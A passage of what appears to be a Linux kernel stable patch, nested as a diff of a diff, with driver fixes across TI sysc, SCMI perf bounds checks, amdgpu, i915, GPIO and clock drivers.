+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 	SYSC_QUIRK("uart", 0, 0x50, 0x54, 0x58, 0x47424e03, 0xffffffff,
+-		   SYSC_QUIRK_SWSUP_SIDLE | SYSC_QUIRK_LEGACY_IDLE),
++		   SYSC_QUIRK_SWSUP_SIDLE_ACT | SYSC_QUIRK_LEGACY_IDLE),
+ 
+ 	/* Quirks that need to be set based on the module address */
+ 	SYSC_QUIRK("mcpdm", 0x40132000, 0, 0x10, -ENODEV, 0x50000800, 0xffffffff,
+@@ -1878,7 +1891,7 @@ static void sysc_pre_reset_quirk_dss(struct sysc *ddata)
+ 		dev_warn(ddata->dev, "%s: timed out %08x !+ %08x\n",
+ 			 __func__, val, irq_mask);
+ 
+-	if (sysc_soc->soc == SOC_3430) {
++	if (sysc_soc->soc == SOC_3430 || sysc_soc->soc == SOC_AM35) {
+ 		/* Clear DSS_SDI_CONTROL */
+ 		sysc_write(ddata, 0x44, 0);
+ 
+@@ -2166,8 +2179,7 @@ static int sysc_reset(struct sysc *ddata)
+ 	}
+ 
+ 	if (ddata->cfg.srst_udelay)
+-		usleep_range(ddata->cfg.srst_udelay,
+-			     ddata->cfg.srst_udelay * 2);
++		fsleep(ddata->cfg.srst_udelay);
+ 
+ 	if (ddata->post_reset_quirk)
+ 		ddata->post_reset_quirk(ddata);
+@@ -3043,6 +3055,7 @@ static void ti_sysc_idle(struct work_struct *work)
+ static const struct soc_device_attribute sysc_soc_match[] = {
+ 	SOC_FLAG("OMAP242*", SOC_2420),
+ 	SOC_FLAG("OMAP243*", SOC_2430),
++	SOC_FLAG("AM35*", SOC_AM35),
+ 	SOC_FLAG("OMAP3[45]*", SOC_3430),
+ 	SOC_FLAG("OMAP3[67]*", SOC_3630),
+ 	SOC_FLAG("OMAP443*", SOC_4430),
+@@ -3249,7 +3262,7 @@ static int sysc_check_active_timer(struct sysc *ddata)
+ 	 * can be dropped if we stop supporting old beagleboard revisions
+ 	 * A to B4 at some point.
+ 	 */
+-	if (sysc_soc->soc == SOC_3430)
++	if (sysc_soc->soc == SOC_3430 || sysc_soc->soc == SOC_AM35)
+ 		error = -ENXIO;
+ 	else
+ 		error = -EBUSY;
+diff --git a/drivers/char/agp/parisc-agp.c b/drivers/char/agp/parisc-agp.c
+index 514f9f287a781..c6f181702b9a7 100644
+--- a/drivers/char/agp/parisc-agp.c
++++ b/drivers/char/agp/parisc-agp.c
+@@ -394,8 +394,6 @@ find_quicksilver(struct device *dev, void *data)
+ static int __init
+ parisc_agp_init(void)
+ {
+-	extern struct sba_device *sba_list;
+-
+ 	int err = -1;
+ 	struct parisc_device *sba = NULL, *lba = NULL;
+ 	struct lba_device *lbadev = NULL;
+diff --git a/drivers/clk/sprd/ums512-clk.c b/drivers/clk/sprd/ums512-clk.c
+index fc25bdd85e4ea..f43bb10bd5ae2 100644
+--- a/drivers/clk/sprd/ums512-clk.c
++++ b/drivers/clk/sprd/ums512-clk.c
+@@ -800,7 +800,7 @@ static SPRD_MUX_CLK_DATA(uart1_clk, "uart1-clk", uart_parents,
+ 			 0x250, 0, 3, UMS512_MUX_FLAG);
+ 
+ static const struct clk_parent_data thm_parents[] = {
+-	{ .fw_name = "ext-32m" },
++	{ .fw_name = "ext-32k" },
+ 	{ .hw = &clk_250k.hw  },
+ };
+ static SPRD_MUX_CLK_DATA(thm0_clk, "thm0-clk", thm_parents,
+diff --git a/drivers/clk/tegra/clk-bpmp.c b/drivers/clk/tegra/clk-bpmp.c
+index d82a71f10c2c1..39241662a412a 100644
+--- a/drivers/clk/tegra/clk-bpmp.c
++++ b/drivers/clk/tegra/clk-bpmp.c
+@@ -159,7 +159,7 @@ static unsigned long tegra_bpmp_clk_recalc_rate(struct clk_hw *hw,
+ 
+ 	err = tegra_bpmp_clk_transfer(clk->bpmp, &msg);
+ 	if (err < 0)
+-		return err;
++		return 0;
+ 
+ 	return response.rate;
+ }
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index c37e823590055..21481fc05800f 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -478,6 +478,19 @@ static u32 ffa_get_num_pages_sg(struct scatterlist *sg)
+ 	return num_pages;
+ }
+ 
++static u8 ffa_memory_attributes_get(u32 func_id)
++{
++	/*
++	 * For the memory lend or donate operation, if the receiver is a PE or
++	 * a proxy endpoint, the owner/sender must not specify the attributes
++	 */
++	if (func_id == FFA_FN_NATIVE(MEM_LEND) ||
++	    func_id == FFA_MEM_LEND)
++		return 0;
++
++	return FFA_MEM_NORMAL | FFA_MEM_WRITE_BACK | FFA_MEM_INNER_SHAREABLE;
++}
++
+ static int
+ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 		       struct ffa_mem_ops_args *args)
+@@ -494,8 +507,7 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 	mem_region->tag = args->tag;
+ 	mem_region->flags = args->flags;
+ 	mem_region->sender_id = drv_info->vm_id;
+-	mem_region->attributes = FFA_MEM_NORMAL | FFA_MEM_WRITE_BACK |
+-				 FFA_MEM_INNER_SHAREABLE;
++	mem_region->attributes = ffa_memory_attributes_get(func_id);
+ 	ep_mem_access = &mem_region->ep_mem_access[0];
+ 
+ 	for (idx = 0; idx < args->nattrs; idx++, ep_mem_access++) {
+diff --git a/drivers/firmware/arm_scmi/perf.c b/drivers/firmware/arm_scmi/perf.c
+index ecf5c4de851b7..431bda9165c3d 100644
+--- a/drivers/firmware/arm_scmi/perf.c
++++ b/drivers/firmware/arm_scmi/perf.c
+@@ -139,7 +139,7 @@ struct perf_dom_info {
+ 
+ struct scmi_perf_info {
+ 	u32 version;
+-	int num_domains;
++	u16 num_domains;
+ 	enum scmi_power_scale power_scale;
+ 	u64 stats_addr;
+ 	u32 stats_size;
+@@ -356,11 +356,26 @@ static int scmi_perf_mb_limits_set(const struct scmi_protocol_handle *ph,
+ 	return ret;
+ }
+ 
++static inline struct perf_dom_info *
++scmi_perf_domain_lookup(const struct scmi_protocol_handle *ph, u32 domain)
++{
++	struct scmi_perf_info *pi = ph->get_priv(ph);
++
++	if (domain >= pi->num_domains)
++		return ERR_PTR(-EINVAL);
++
++	return pi->dom_info + domain;
++}
++
+ static int scmi_perf_limits_set(const struct scmi_protocol_handle *ph,
+ 				u32 domain, u32 max_perf, u32 min_perf)
+ {
+ 	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (PROTOCOL_REV_MAJOR(pi->version) >= 0x3 && !max_perf && !min_perf)
+ 		return -EINVAL;
+@@ -408,8 +423,11 @@ static int scmi_perf_mb_limits_get(const struct scmi_protocol_handle *ph,
+ static int scmi_perf_limits_get(const struct scmi_protocol_handle *ph,
+ 				u32 domain, u32 *max_perf, u32 *min_perf)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (dom->fc_info && dom->fc_info[PERF_FC_LIMIT].get_addr) {
+ 		struct scmi_fc_info *fci = &dom->fc_info[PERF_FC_LIMIT];
+@@ -449,8 +467,11 @@ static int scmi_perf_mb_level_set(const struct scmi_protocol_handle *ph,
+ static int scmi_perf_level_set(const struct scmi_protocol_handle *ph,
+ 			       u32 domain, u32 level, bool poll)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (dom->fc_info && dom->fc_info[PERF_FC_LEVEL].set_addr) {
+ 		struct scmi_fc_info *fci = &dom->fc_info[PERF_FC_LEVEL];
+@@ -490,8 +511,11 @@ static int scmi_perf_mb_level_get(const struct scmi_protocol_handle *ph,
+ static int scmi_perf_level_get(const struct scmi_protocol_handle *ph,
+ 			       u32 domain, u32 *level, bool poll)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	if (dom->fc_info && dom->fc_info[PERF_FC_LEVEL].get_addr) {
+ 		*level = ioread32(dom->fc_info[PERF_FC_LEVEL].get_addr);
+@@ -574,13 +598,14 @@ static int scmi_dvfs_device_opps_add(const struct scmi_protocol_handle *ph,
+ 	unsigned long freq;
+ 	struct scmi_opp *opp;
+ 	struct perf_dom_info *dom;
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+ 
+ 	domain = scmi_dev_domain_id(dev);
+ 	if (domain < 0)
+-		return domain;
++		return -EINVAL;
+ 
+-	dom = pi->dom_info + domain;
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	for (opp = dom->opp, idx = 0; idx < dom->opp_count; idx++, opp++) {
+ 		freq = opp->perf * dom->mult_factor;
+@@ -603,14 +628,17 @@ static int
+ scmi_dvfs_transition_latency_get(const struct scmi_protocol_handle *ph,
+ 				 struct device *dev)
+ {
++	int domain;
+ 	struct perf_dom_info *dom;
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	int domain = scmi_dev_domain_id(dev);
+ 
++	domain = scmi_dev_domain_id(dev);
+ 	if (domain < 0)
+-		return domain;
++		return -EINVAL;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+-	dom = pi->dom_info + domain;
+ 	/* uS to nS */
+ 	return dom->opp[dom->opp_count - 1].trans_latency_us * 1000;
+ }
+@@ -618,8 +646,11 @@ scmi_dvfs_transition_latency_get(const struct scmi_protocol_handle *ph,
+ static int scmi_dvfs_freq_set(const struct scmi_protocol_handle *ph, u32 domain,
+ 			      unsigned long freq, bool poll)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
++	struct perf_dom_info *dom;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	return scmi_perf_level_set(ph, domain, freq / dom->mult_factor, poll);
+ }
+@@ -630,11 +661,14 @@ static int scmi_dvfs_freq_get(const struct scmi_protocol_handle *ph, u32 domain,
+ 	int ret;
+ 	u32 level;
+ 	struct scmi_perf_info *pi = ph->get_priv(ph);
+-	struct perf_dom_info *dom = pi->dom_info + domain;
+ 
+ 	ret = scmi_perf_level_get(ph, domain, &level, poll);
+-	if (!ret)
++	if (!ret) {
++		struct perf_dom_info *dom = pi->dom_info + domain;
++
++		/* Note domain is validated implicitly by scmi_perf_level_get */
+ 		*freq = level * dom->mult_factor;
++	}
+ 
+ 	return ret;
+ }
+@@ -643,15 +677,14 @@ static int scmi_dvfs_est_power_get(const struct scmi_protocol_handle *ph,
+ 				   u32 domain, unsigned long *freq,
+ 				   unsigned long *power)
+ {
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+ 	struct perf_dom_info *dom;
+ 	unsigned long opp_freq;
+ 	int idx, ret = -EINVAL;
+ 	struct scmi_opp *opp;
+ 
+-	dom = pi->dom_info + domain;
+-	if (!dom)
+-		return -EIO;
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return PTR_ERR(dom);
+ 
+ 	for (opp = dom->opp, idx = 0; idx < dom->opp_count; idx++, opp++) {
+ 		opp_freq = opp->perf * dom->mult_factor;
+@@ -670,10 +703,16 @@ static int scmi_dvfs_est_power_get(const struct scmi_protocol_handle *ph,
+ static bool scmi_fast_switch_possible(const struct scmi_protocol_handle *ph,
+ 				      struct device *dev)
+ {
++	int domain;
+ 	struct perf_dom_info *dom;
+-	struct scmi_perf_info *pi = ph->get_priv(ph);
+ 
+-	dom = pi->dom_info + scmi_dev_domain_id(dev);
++	domain = scmi_dev_domain_id(dev);
++	if (domain < 0)
++		return false;
++
++	dom = scmi_perf_domain_lookup(ph, domain);
++	if (IS_ERR(dom))
++		return false;
+ 
+ 	return dom->fc_info && dom->fc_info[PERF_FC_LEVEL].set_addr;
+ }
+@@ -819,6 +858,8 @@ static int scmi_perf_protocol_init(const struct scmi_protocol_handle *ph)
+ 	if (!pinfo)
+ 		return -ENOMEM;
+ 
++	pinfo->version = version;
++
+ 	ret = scmi_perf_attributes_get(ph, pinfo);
+ 	if (ret)
+ 		return ret;
+@@ -838,8 +879,6 @@ static int scmi_perf_protocol_init(const struct scmi_protocol_handle *ph)
+ 			scmi_perf_domain_init_fc(ph, domain, &dom->fc_info);
+ 	}
+ 
+-	pinfo->version = version;
+-
+ 	return ph->set_priv(ph, pinfo);
+ }
+ 
+diff --git a/drivers/firmware/cirrus/cs_dsp.c b/drivers/firmware/cirrus/cs_dsp.c
+index 81c5f94b1be11..64ed9d3f5d5d8 100644
+--- a/drivers/firmware/cirrus/cs_dsp.c
++++ b/drivers/firmware/cirrus/cs_dsp.c
+@@ -1821,15 +1821,15 @@ static int cs_dsp_adsp2_setup_algs(struct cs_dsp *dsp)
+ 		return PTR_ERR(adsp2_alg);
+ 
+ 	for (i = 0; i < n_algs; i++) {
+-		cs_dsp_info(dsp,
+-			    "%d: ID %x v%d.%d.%d XM@%x YM@%x ZM@%x\n",
+-			    i, be32_to_cpu(adsp2_alg[i].alg.id),
+-			    (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff0000) >> 16,
+-			    (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff00) >> 8,
+-			    be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff,
+-			    be32_to_cpu(adsp2_alg[i].xm),
+-			    be32_to_cpu(adsp2_alg[i].ym),
+-			    be32_to_cpu(adsp2_alg[i].zm));
++		cs_dsp_dbg(dsp,
++			   "%d: ID %x v%d.%d.%d XM@%x YM@%x ZM@%x\n",
++			   i, be32_to_cpu(adsp2_alg[i].alg.id),
++			   (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff0000) >> 16,
++			   (be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff00) >> 8,
++			   be32_to_cpu(adsp2_alg[i].alg.ver) & 0xff,
++			   be32_to_cpu(adsp2_alg[i].xm),
++			   be32_to_cpu(adsp2_alg[i].ym),
++			   be32_to_cpu(adsp2_alg[i].zm));
+ 
+ 		alg_region = cs_dsp_create_region(dsp, WMFW_ADSP2_XM,
+ 						  adsp2_alg[i].alg.id,
+@@ -1954,14 +1954,14 @@ static int cs_dsp_halo_setup_algs(struct cs_dsp *dsp)
+ 		return PTR_ERR(halo_alg);
+ 
+ 	for (i = 0; i < n_algs; i++) {
+-		cs_dsp_info(dsp,
+-			    "%d: ID %x v%d.%d.%d XM@%x YM@%x\n",
+-			    i, be32_to_cpu(halo_alg[i].alg.id),
+-			    (be32_to_cpu(halo_alg[i].alg.ver) & 0xff0000) >> 16,
+-			    (be32_to_cpu(halo_alg[i].alg.ver) & 0xff00) >> 8,
+-			    be32_to_cpu(halo_alg[i].alg.ver) & 0xff,
+-			    be32_to_cpu(halo_alg[i].xm_base),
+-			    be32_to_cpu(halo_alg[i].ym_base));
++		cs_dsp_dbg(dsp,
++			   "%d: ID %x v%d.%d.%d XM@%x YM@%x\n",
++			   i, be32_to_cpu(halo_alg[i].alg.id),
++			   (be32_to_cpu(halo_alg[i].alg.ver) & 0xff0000) >> 16,
++			   (be32_to_cpu(halo_alg[i].alg.ver) & 0xff00) >> 8,
++			   be32_to_cpu(halo_alg[i].alg.ver) & 0xff,
++			   be32_to_cpu(halo_alg[i].xm_base),
++			   be32_to_cpu(halo_alg[i].ym_base));
+ 
+ 		ret = cs_dsp_halo_create_regions(dsp, halo_alg[i].alg.id,
+ 						 halo_alg[i].alg.ver,
+diff --git a/drivers/firmware/imx/imx-dsp.c b/drivers/firmware/imx/imx-dsp.c
+index a6c06d7476c32..1f410809d3ee4 100644
+--- a/drivers/firmware/imx/imx-dsp.c
++++ b/drivers/firmware/imx/imx-dsp.c
+@@ -115,6 +115,7 @@ static int imx_dsp_setup_channels(struct imx_dsp_ipc *dsp_ipc)
+ 		dsp_chan->idx = i % 2;
+ 		dsp_chan->ch = mbox_request_channel_byname(cl, chan_name);
+ 		if (IS_ERR(dsp_chan->ch)) {
++			kfree(dsp_chan->name);
+ 			ret = PTR_ERR(dsp_chan->ch);
+ 			if (ret != -EPROBE_DEFER)
+ 				dev_err(dev, "Failed to request mbox chan %s ret %d\n",
+diff --git a/drivers/gpio/gpio-pmic-eic-sprd.c b/drivers/gpio/gpio-pmic-eic-sprd.c
+index e518490c4b681..ebbbcb54270d1 100644
+--- a/drivers/gpio/gpio-pmic-eic-sprd.c
++++ b/drivers/gpio/gpio-pmic-eic-sprd.c
+@@ -337,6 +337,7 @@ static int sprd_pmic_eic_probe(struct platform_device *pdev)
+ 	pmic_eic->chip.set_config = sprd_pmic_eic_set_config;
+ 	pmic_eic->chip.set = sprd_pmic_eic_set;
+ 	pmic_eic->chip.get = sprd_pmic_eic_get;
++	pmic_eic->chip.can_sleep = true;
+ 
+ 	pmic_eic->intc.name = dev_name(&pdev->dev);
+ 	pmic_eic->intc.irq_mask = sprd_pmic_eic_irq_mask;
+diff --git a/drivers/gpio/gpio-tb10x.c b/drivers/gpio/gpio-tb10x.c
+index de6afa3f97168..05357473d2a11 100644
+--- a/drivers/gpio/gpio-tb10x.c
++++ b/drivers/gpio/gpio-tb10x.c
+@@ -195,7 +195,7 @@ static int tb10x_gpio_probe(struct platform_device *pdev)
+ 				handle_edge_irq, IRQ_NOREQUEST, IRQ_NOPROBE,
+ 				IRQ_GC_INIT_MASK_CACHE);
+ 		if (ret)
+-			return ret;
++			goto err_remove_domain;
+ 
+ 		gc = tb10x_gpio->domain->gc->gc[0];
+ 		gc->reg_base                         = tb10x_gpio->base;
+@@ -209,6 +209,10 @@ static int tb10x_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	return 0;
++
++err_remove_domain:
++	irq_domain_remove(tb10x_gpio->domain);
++	return ret;
+ }
+ 
+ static int tb10x_gpio_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+index 9e3313dd956ae..24b4bd6bb2771 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_kms.c
+@@ -896,12 +896,17 @@ int amdgpu_info_ioctl(struct drm_device *dev, void *data, struct drm_file *filp)
+ 			struct atom_context *atom_context;
+ 
+ 			atom_context = adev->mode_info.atom_context;
+-			memcpy(vbios_info.name, atom_context->name, sizeof(atom_context->name));
+-			memcpy(vbios_info.vbios_pn, atom_context->vbios_pn, sizeof(atom_context->vbios_pn));
+-			vbios_info.version = atom_context->version;
+-			memcpy(vbios_info.vbios_ver_str, atom_context->vbios_ver_str,
+-						sizeof(atom_context->vbios_ver_str));
+-			memcpy(vbios_info.date, atom_context->date, sizeof(atom_context->date));
++			if (atom_context) {
++				memcpy(vbios_info.name, atom_context->name,
++				       sizeof(atom_context->name));
++				memcpy(vbios_info.vbios_pn, atom_context->vbios_pn,
++				       sizeof(atom_context->vbios_pn));
++				vbios_info.version = atom_context->version;
++				memcpy(vbios_info.vbios_ver_str, atom_context->vbios_ver_str,
++				       sizeof(atom_context->vbios_ver_str));
++				memcpy(vbios_info.date, atom_context->date,
++				       sizeof(atom_context->date));
++			}
+ 
+ 			return copy_to_user(out, &vbios_info,
+ 						min((size_t)size, sizeof(vbios_info))) ? -EFAULT : 0;
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+index 09fdcd20cb919..c52a378396af1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v4_3.c
+@@ -344,6 +344,9 @@ static void nbio_v4_3_init_registers(struct amdgpu_device *adev)
+ 		data &= ~RCC_DEV0_EPF2_STRAP2__STRAP_NO_SOFT_RESET_DEV0_F2_MASK;
+ 		WREG32_SOC15(NBIO, 0, regRCC_DEV0_EPF2_STRAP2, data);
+ 	}
++	if (amdgpu_sriov_vf(adev))
++		adev->rmmio_remap.reg_offset = SOC15_REG_OFFSET(NBIO, 0,
++			regBIF_BX_DEV0_EPF0_VF0_HDP_MEM_COHERENCY_FLUSH_CNTL) << 2;
+ }
+ 
+ static u32 nbio_v4_3_get_rom_offset(struct amdgpu_device *adev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc21.c b/drivers/gpu/drm/amd/amdgpu/soc21.c
+index d150a90daa403..56af7b5abac14 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc21.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc21.c
+@@ -755,7 +755,7 @@ static int soc21_common_hw_init(void *handle)
+ 	 * for the purpose of expose those registers
+ 	 * to process space
+ 	 */
+-	if (adev->nbio.funcs->remap_hdp_registers)
++	if (adev->nbio.funcs->remap_hdp_registers && !amdgpu_sriov_vf(adev))
+ 		adev->nbio.funcs->remap_hdp_registers(adev);
+ 	/* enable the doorbell aperture */
+ 	soc21_enable_doorbell_aperture(adev, true);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+index c06ada0844ba1..0b87034d9dd51 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_device_queue_manager.c
+@@ -201,7 +201,7 @@ static int add_queue_mes(struct device_queue_manager *dqm, struct queue *q,
+ 
+ 	if (q->wptr_bo) {
+ 		wptr_addr_off = (uint64_t)q->properties.write_ptr & (PAGE_SIZE - 1);
+-		queue_input.wptr_mc_addr = ((uint64_t)q->wptr_bo->tbo.resource->start << PAGE_SHIFT) + wptr_addr_off;
++		queue_input.wptr_mc_addr = amdgpu_bo_gpu_offset(q->wptr_bo) + wptr_addr_off;
+ 	}
+ 
+ 	queue_input.is_kfd_process = 1;
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index 6d6588b9beed7..ec8a576ac5a9e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -1349,9 +1349,8 @@ void kfd_flush_tlb(struct kfd_process_device *pdd, enum TLB_FLUSH_TYPE type);
+ 
+ static inline bool kfd_flush_tlb_after_unmap(struct kfd_dev *dev)
+ {
+-	return KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 2) ||
+-	       (KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 1) &&
+-	       dev->adev->sdma.instance[0].fw_version >= 18) ||
++	return KFD_GC_VERSION(dev) > IP_VERSION(9, 4, 2) ||
++	       (KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 1) && dev->sdma_fw_version >= 18) ||
+ 	       KFD_GC_VERSION(dev) == IP_VERSION(9, 4, 0);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+index 9378c98d02cfe..508f5fe268484 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
++++ b/drivers/gpu/drm/amd/display/dc/dce110/dce110_hw_sequencer.c
+@@ -973,7 +973,9 @@ void dce110_edp_backlight_control(
+ 		return;
+ 	}
+ 
+-	if (link->panel_cntl) {
++	if (link->panel_cntl && !(link->dpcd_sink_ext_caps.bits.oled ||
++		link->dpcd_sink_ext_caps.bits.hdr_aux_backlight_control == 1 ||
++		link->dpcd_sink_ext_caps.bits.sdr_aux_backlight_control == 1)) {
+ 		bool is_backlight_on = link->panel_cntl->funcs->is_panel_backlight_on(link->panel_cntl);
+ 
+ 		if ((enable && is_backlight_on) || (!enable && !is_backlight_on)) {
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 55efd3eb66723..3f43b44145a89 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -655,7 +655,9 @@ static int sn65dsi83_host_attach(struct sn65dsi83 *ctx)
+ 
+ 	dsi->lanes = dsi_lanes;
+ 	dsi->format = MIPI_DSI_FMT_RGB888;
+-	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST;
++	dsi->mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_BURST |
++			  MIPI_DSI_MODE_VIDEO_NO_HFP | MIPI_DSI_MODE_VIDEO_NO_HBP |
++			  MIPI_DSI_MODE_VIDEO_NO_HSA | MIPI_DSI_MODE_NO_EOT_PACKET;
+ 
+ 	ret = devm_mipi_dsi_attach(dev, dsi);
+ 	if (ret < 0) {
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index b458547e1fc6e..07967adce16aa 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -541,7 +541,6 @@ static int intel_engine_setup(struct intel_gt *gt, enum intel_engine_id id,
+ 		DRIVER_CAPS(i915)->has_logical_contexts = true;
+ 
+ 	ewma__engine_latency_init(&engine->latency);
+-	seqcount_init(&engine->stats.execlists.lock);
+ 
+ 	ATOMIC_INIT_NOTIFIER_HEAD(&engine->context_status_notifier);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index fc4a846289855..f903ee1ce06e7 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -3546,6 +3546,8 @@ int intel_execlists_submission_setup(struct intel_engine_cs *engine)
+ 	logical_ring_default_vfuncs(engine);
+ 	logical_ring_default_irqs(engine);
+ 
++	seqcount_init(&engine->stats.execlists.lock);
++
+ 	if (engine->flags & I915_ENGINE_HAS_RCS_REG_STATE)
+ 		rcs_submission_override(engine);
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_ggtt.c b/drivers/gpu/drm/i915/gt/intel_ggtt.c
+index 2049a00417afa..a6d0463b18d91 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ggtt.c
++++ b/drivers/gpu/drm/i915/gt/intel_ggtt.c
+@@ -500,20 +500,31 @@ void intel_ggtt_unbind_vma(struct i915_address_space *vm,
+ 	vm->clear_range(vm, vma_res->start, vma_res->vma_size);
+ }
+ 
++/*
++ * Reserve the top of the GuC address space for firmware images. Addresses
++ * beyond GUC_GGTT_TOP in the GuC address space are inaccessible by GuC,
++ * which makes for a suitable range to hold GuC/HuC firmware images if the
++ * size of the GGTT is 4G. However, on a 32-bit platform the size of the GGTT
++ * is limited to 2G, which is less than GUC_GGTT_TOP, but we reserve a chunk
++ * of the same size anyway, which is far more than needed, to keep the logic
++ * in uc_fw_ggtt_offset() simple.
++ */
++#define GUC_TOP_RESERVE_SIZE (SZ_4G - GUC_GGTT_TOP)
++
+ static int ggtt_reserve_guc_top(struct i915_ggtt *ggtt)
+ {
+-	u64 size;
++	u64 offset;
+ 	int ret;
+ 
+ 	if (!intel_uc_uses_guc(&ggtt->vm.gt->uc))
+ 		return 0;
+ 
+-	GEM_BUG_ON(ggtt->vm.total <= GUC_GGTT_TOP);
+-	size = ggtt->vm.total - GUC_GGTT_TOP;
++	GEM_BUG_ON(ggtt->vm.total <= GUC_TOP_RESERVE_SIZE);
++	offset = ggtt->vm.total - GUC_TOP_RESERVE_SIZE;
+ 
+-	ret = i915_gem_gtt_reserve(&ggtt->vm, NULL, &ggtt->uc_fw, size,
+-				   GUC_GGTT_TOP, I915_COLOR_UNEVICTABLE,
+-				   PIN_NOEVICT);
++	ret = i915_gem_gtt_reserve(&ggtt->vm, NULL, &ggtt->uc_fw,
++				   GUC_TOP_RESERVE_SIZE, offset,
++				   I915_COLOR_UNEVICTABLE, PIN_NOEVICT);
+ 	if (ret)
+ 		drm_dbg(&ggtt->vm.i915->drm,
+ 			"Failed to reserve top of GGTT for GuC\n");
+diff --git a/drivers/gpu/drm/meson/meson_encoder_hdmi.c b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+index 53231bfdf7e24..b14e6e507c61b 100644
+--- a/drivers/gpu/drm/meson/meson_encoder_hdmi.c
++++ b/drivers/gpu/drm/meson/meson_encoder_hdmi.c
+@@ -332,6 +332,8 @@ static void meson_encoder_hdmi_hpd_notify(struct drm_bridge *bridge,
+ 			return;
+ 
